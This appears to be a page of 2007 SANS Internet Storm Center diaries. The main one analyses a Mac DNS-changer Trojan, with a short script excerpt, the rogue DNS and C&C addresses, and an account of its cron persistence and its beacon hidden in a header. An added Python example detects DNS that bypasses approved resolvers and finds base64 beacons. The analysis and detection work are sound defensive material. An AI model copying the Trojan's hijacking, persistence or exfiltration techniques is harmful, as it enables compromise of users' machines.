As security professionals, we all meet organizations maintaining network diagrams that do not fully match reality. Their perimeter is not where they thought it was, or various hosts are exposed in ways not fully realized. Making good risk management decisions starts with great asset management, and this requires you to keep your maps up to date. From experience, it appears to me that smaller organizations have problems keeping smaller diagrams up-to-date, while larger organizations have really good detail diagrams for individual solutions, but are lacking insight in their overall, distributed network environment.

Some ways to remediate this:

  • Recognize that diagrams may not be accurate by assigning a confidence rating to each of them, and then work to increase confidence through verification;
  • Use vulnerability management such as scanning to identify assets. However, always take into account their limitations (discovery can be slow, is always incomplete – even when you scan 65535 ports on a variety of protocols);
  • Network IDS can sometimes contribute if you're looking beyond the individual alerts but at overall flows.

I'm very interested in hearing from you on measures you've taken to deal with these issues.

--
Maarten Van Horenbeeck

0 Comments

Published: 2007-11-01

Cyber Security Awareness Month - Summary and Links

On behalf of the volunteer handlers of the SANS Internet Storm Center, I'd like to pass along our deep appreciation to all of the readers who sent in hundreds of comments and ideas during the past month!  As promised, below is an index to all of the Cyber Security Awareness Month diaries that were published over the past 31 days.  We are working on producing a full document that has all of the submissions (cleaned up, reformatted, and sanitized if needed) that were received.  As you can imagine it will be a while before it's ready for downloading due to the volume of information that was sent to us.  If you have any final thoughts or want to add some additional tips to the subjects, please send them to us via our contact form.

1. Establishing a User Awareness Training Program
  1 Penetrating the "This Does Not Apply To Me" Attitude
  2 Multimedia Tools, Online Training, and Useful Websites
  3 Getting the Boss Involved
  4 Enabling the Road Warrior
  5 Social Engineering and Dumpster Diving Awareness
  6 Developing and Distributing Infosec Policies

2. Best Practices
  7 Host-based Firewalls and Filtering
  8 Anti-Virus, Anti-Spyware, and Other Protective Software
  9 Access Controls, Including Wireless, Modems, VPNs, and Physical Access
 10 Authentication Mechanisms (Passwords, Tokens, Biometrics, Kerberos, NTLM, Radius)
 11 File System Backups
 12 Managing and Understanding Logs on the Desktop or Laptop (AV, Firewall, or System Logs)
 13 Patching and Updates

3. Hardware/Software Lockdown
 14 Data Encryption
 15 Protecting Laptops
 16 Protecting Portable Media like USB Keys, iPods, PDAs, and Mobile Phones
 17 Windows XP/Vista Tips
 18 Mac Tips
 19 Linux Tips
 20 Software Authenticity (Digital Signatures, MD5, etc.)

4. Safe Internet Use
 21 Understanding Online Threats, Phishing, Fraud, Keystroke Loggers
 22 Detecting and Avoiding Bots and Zombies
 23 Using Browsers, SSL, Domain Names
 24 Not All Patches Are Released on a Tuesday
 25 Using Email, PGP, X509 Certs, Attachments, Instant Messaging and IRC
 26 Safe File Swapping
 27 Online Games and Virtual Worlds

5. Privacy and Protection of Intellectual Property
 28 Cookies
 29 Insider Threats
 30 Blogging and Social Networking
 31 Legal Awareness (Regulatory, Statutory, etc.)

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-11-01

DNS changer Trojan for Mac (!) in the wild

We received some reports of various companies (http://www.intego.com/news/ism0705.asp) reporting a Mac DNS changer Trojan in the wild. As I happened to receive a sample of it, I decided to analyze it quickly.

The whole Trojan is relatively simple and works almost exactly the same as its brother for Windows operating systems. When executed, the Trojan changes the DNS settings on the machine and reports back to the C&C server.

While the Trojan is relatively simple and not a big threat, two things came to my mind immediately: the bad guys are now taking the Mac seriously; this is a professional attempt at attacking Mac systems (and it could have been much more damaging). The second thing, which the folks at Sunbelt noticed (http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html), is that when they sent a sample to VirusTotal, 0 (zero, nada, nilch) products detected it.

So, let's see what really happens here. The "social engineering" part has been seen a million times: an unsuspecting user visits a web site with a movie on it, but needs to download a new codec in order to view it. On Windows that new codec is typically a PE executable; for the Mac the bad guys prepared a DMG archive (DMG files are like ISOs). The user is then prompted to install the package and during this process has to supply administrator credentials. Yep, it's game over from this point (and the attack is exactly the same as on Windows; keep in mind that these users *will* willingly supply those credentials).

Mac installer

Now that we know what happens, let’s see how this whole thing works. I analyzed this on a Linux machine so I first had to convert the DMG file into something Linux can read (an ISO). There is a simple dmg2img utility available from http://vu1tur.eu.org/tools/ that does the job perfectly.

Once you converted the file to an ISO image, you can mount it and see what’s going on. The most important directory is Resources which contains scripts that are executed before and after the installation. The files that get installed are kept in the Archive.pax.gz file – it’s a gzip compressed cpio file.

The preinstall/preupgrade files from the Resources directory get executed immediately after the installation starts (and they do the main job). These two files are just shell scripts which change the DNS server settings on the machine by using the scutil utility. Here’s what they set the DNS servers to:

#!/bin/bash

s1=85.255.116.71
s2=85.255.112.63

path="/Library/Internet Plug-Ins"

(Yes, the IP addresses are familiar). The scripts also create a new cronjob that gets executed every minute. The cron job executes a file called plugins.settings, which is just a copy of the preinstall/preupgrade files – it makes sure that the DNS servers stay as those above and that the cronjob is not removed.

Finally, the postinstall/postupgrade scripts execute a Perl script called sendreq. This Perl script collects some information about the local machine (uname –p and hostname), Base64 encodes them and sends the information to the C&C server (85.255.121.37). An interesting thing is that this gets submitted as the Accept-Language: header so it should be easy to write a Snort signature to catch this.

As I said, although the Trojan is really simple, it could have done much worse things (once the installer script has root privileges it is game over anyway). This malware shows that we must not ignore Mac machines, and that Mac users should not think they are invulnerable just because they use a Mac and can click on absolutely everything.

From the network point of view: pay attention to DNS traffic. Any DNS requests that leave your network and do not originate from your own DNS servers are coming from either infected or misconfigured machines.
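Two detections follow from this analysis: DNS leaving the network from anything other than your own resolvers (and in particular to the two servers in the script excerpt), and HTTP requests whose Accept-Language header carries base64 rather than a language tag. The Python below is an added example, not part of the diary: it runs both checks over constructed flow records and proxy-log header values. The approved resolver and the client addresses are made up for the example; the rogue DNS and C&C addresses are the ones named above.

```python
import base64
import re

APPROVED_RESOLVERS = {"10.0.0.53"}                 # constructed: the site's own resolvers
ROGUE_DNS = {"85.255.116.71", "85.255.112.63"}     # s1/s2 from the script excerpt above
C2_SERVER = "85.255.121.37"                        # where sendreq reports to, per the text above

# Constructed flow records: (src_ip, dst_ip, protocol, dst_port)
FLOWS = [
    ("10.0.0.53", "198.41.0.4", "udp", 53),      # your resolver talking to a root: expected
    ("10.0.0.21", "10.0.0.53", "udp", 53),       # client to your resolver: expected
    ("10.0.0.42", "85.255.116.71", "udp", 53),   # client to the changer's server: infected
    ("10.0.0.77", "192.0.2.53", "udp", 53),      # client to some outside resolver: misconfigured
    ("10.0.0.21", "192.0.2.80", "tcp", 80),      # ordinary web traffic: ignored
]

# Constructed (client_ip, Accept-Language value) pairs from a proxy log. The
# beacon value is what sendreq would send: base64 of "uname -p" plus the hostname.
HTTP_REQUESTS = [
    ("10.0.0.21", "en-US,en;q=0.5"),
    ("10.0.0.42", base64.b64encode(b"i386 mac-mini.local").decode()),
    ("10.0.0.77", "*"),
]


def dns_bypass(flows, approved=APPROVED_RESOLVERS, rogue=ROGUE_DNS):
    """DNS from anything other than the approved resolvers, to anything other
    than the approved resolvers, is either a changer victim or a misconfigured host."""
    hits = []
    for src, dst, proto, dport in flows:
        if dport != 53 or src in approved or dst in approved:
            continue
        hits.append((src, dst, "known-changer-server" if dst in rogue else "dns-bypass"))
    return hits


# Accept-Language syntax: language tags (or '*'), optional ;q=, comma separated.
_TAG = r"(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)(?:\s*;\s*q=[0-9.]+)?"
ACCEPT_LANGUAGE = re.compile(r"^%s(?:\s*,\s*%s)*$" % (_TAG, _TAG))


def looks_like_beacon(value):
    """True if the header is not a valid Accept-Language value but is valid
    base64, the Trojan's way of hiding host data in an innocuous header.
    A short all-letter base64 string is indistinguishable from a language tag,
    so this heuristic errs toward silence rather than noise."""
    value = value.strip()
    if not value or ACCEPT_LANGUAGE.match(value):
        return False
    try:
        return len(base64.b64decode(value, validate=True)) > 0
    except ValueError:            # binascii.Error is a ValueError subclass
        return False


def beacon_hits(requests):
    return [(ip, v) for ip, v in requests if looks_like_beacon(v)]


if __name__ == "__main__":
    for hit in dns_bypass(FLOWS):
        print("dns:", *hit)
    for ip, value in beacon_hits(HTTP_REQUESTS):
        print("beacon:", ip, base64.b64decode(value))
```

The DNS check is the durable one: it catches the next changer with different server addresses, whereas the header check only finds this family's reporting script, and even then only while its encoding stays the same.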

--

Bojan

1 Comments